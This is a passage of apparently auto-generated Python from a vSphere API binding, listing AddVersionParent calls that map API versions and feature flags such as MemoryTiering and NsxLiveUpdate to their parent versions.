AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version7")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version4")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version5")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.VSPHERE_DP_TELEMETRY")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v6_9_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v6_8_7")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version13")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version14")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version15")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version10")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version11")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version12")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version8")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version9")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version6")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version7")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version5")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version4")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version3")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.MemoryTiering")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version0")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v6_9_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v6_8_7")
AddVersionParent("vim.version.MemoryTiering", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version13")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version14")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version15")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version10")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version11")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version12")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version8")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version9")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version6")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version7")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version4")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version5")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version3")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version13")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version14")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version15")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version10")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version11")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version12")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version8")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version9")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version6")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version7")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version4")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version5")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version3")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version4")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version3")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v6_9_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v6_8_7")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version13")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version14")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version15")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version10")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version11")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version12")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version8")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version9")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version6")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version7")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version4")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version5")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version3")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version4")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version3")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.guestDetailedData")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version0")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v6_9_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v6_8_7")
AddVersionParent("vim.version.guestDetailedData", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version13")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version14")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version15")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version10")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version11")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version12")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version8")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version9")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version6")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version7")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version4")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version5")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version3")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version4")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version3")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v6_9_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v6_8_7")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version13")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version14")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version15")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version10")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version11")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version12")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version8")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version9")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version6")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version7")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version4")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version5")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version3")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version4")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version3")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version2")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vdcs", "vim.version.vdcs")
AddVersionParent("vim.version.vdcs", "vmodl.version.version0")
AddVersionParent("vim.version.vdcs", "vmodl.version.version1")
AddVersionParent("vim.version.vdcs", "vmodl.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.v6_9_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vdcs", "vim.version.v6_8_7")
AddVersionParent("vim.version.vdcs", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vdcs", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vdcs", "vim.version.version13")
AddVersionParent("vim.version.vdcs", "vim.version.version14")
AddVersionParent("vim.version.vdcs", "vim.version.version15")
AddVersionParent("vim.version.vdcs", "vim.version.version10")
AddVersionParent("vim.version.vdcs", "vim.version.version11")
AddVersionParent("vim.version.vdcs", "vim.version.version12")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0")
AddVersionParent("vim.version.vdcs", "vim.version.version8")
AddVersionParent("vim.version.vdcs", "vim.version.version9")
AddVersionParent("vim.version.vdcs", "vim.version.version6")
AddVersionParent("vim.version.vdcs", "vim.version.version7")
AddVersionParent("vim.version.vdcs", "vim.version.version1")
AddVersionParent("vim.version.vdcs", "vim.version.version4")
AddVersionParent("vim.version.vdcs", "vim.version.version5")
AddVersionParent("vim.version.vdcs", "vim.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.version3")
AddVersionParent("vmodl.version.version0", "vmodl.version.version0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version4")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version3")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v6_9_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v6_8_7")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version13")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version14")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version15")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version10")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version11")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version12")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version8")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version9")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version6")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version7")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version4")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version5")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version3")
AddVersionParent("vmodl.version.version1", "vmodl.version.version0")
AddVersionParent("vmodl.version.version1", "vmodl.version.version1")
AddVersionParent("vmodl.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.version.version2", "vmodl.version.version2")
AddVersionParent("dp.version.version1", "vmodl.query.version.version4")
AddVersionParent("dp.version.version1", "vmodl.query.version.version3")
AddVersionParent("dp.version.version1", "vmodl.query.version.version2")
AddVersionParent("dp.version.version1", "vmodl.query.version.version1")
AddVersionParent("dp.version.version1", "vmodl.version.version0")
AddVersionParent("dp.version.version1", "vmodl.version.version1")
AddVersionParent("dp.version.version1", "vmodl.version.version2")
AddVersionParent("dp.version.version1", "dp.version.version1")
AddVersionParent("dp.version.version1", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.version1", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.version1", "vim.version.version13")
AddVersionParent("dp.version.version1", "vim.version.version14")
AddVersionParent("dp.version.version1", "vim.version.version15")
AddVersionParent("dp.version.version1", "vim.version.version10")
AddVersionParent("dp.version.version1", "vim.version.version11")
AddVersionParent("dp.version.version1", "vim.version.version12")
AddVersionParent("dp.version.version1", "vim.version.version8")
AddVersionParent("dp.version.version1", "vim.version.version9")
AddVersionParent("dp.version.version1", "vim.version.version6")
AddVersionParent("dp.version.version1", "vim.version.version7")
AddVersionParent("dp.version.version1", "vim.version.version1")
AddVersionParent("dp.version.version1", "vim.version.version4")
AddVersionParent("dp.version.version1", "vim.version.version5")
AddVersionParent("dp.version.version1", "vim.version.version2")
AddVersionParent("dp.version.version1", "vim.version.version3")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version0")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v6_9_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v6_9_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.version13")
AddVersionParent("vim.version.v6_9_1", "vim.version.version14")
AddVersionParent("vim.version.v6_9_1", "vim.version.version15")
AddVersionParent("vim.version.v6_9_1", "vim.version.version10")
AddVersionParent("vim.version.v6_9_1", "vim.version.version11")
AddVersionParent("vim.version.v6_9_1", "vim.version.version12")
AddVersionParent("vim.version.v6_9_1", "vim.version.version8")
AddVersionParent("vim.version.v6_9_1", "vim.version.version9")
AddVersionParent("vim.version.v6_9_1", "vim.version.version6")
AddVersionParent("vim.version.v6_9_1", "vim.version.version7")
AddVersionParent("vim.version.v6_9_1", "vim.version.version1")
AddVersionParent("vim.version.v6_9_1", "vim.version.version4")
AddVersionParent("vim.version.v6_9_1", "vim.version.version5")
AddVersionParent("vim.version.v6_9_1", "vim.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.version3")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version13")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version14")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version15")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version10")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version11")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version12")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version8")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version9")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version6")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version7")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version4")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version5")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version4")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version0")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v6_9_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.NsxLiveUpdate")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v6_8_7")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_1")
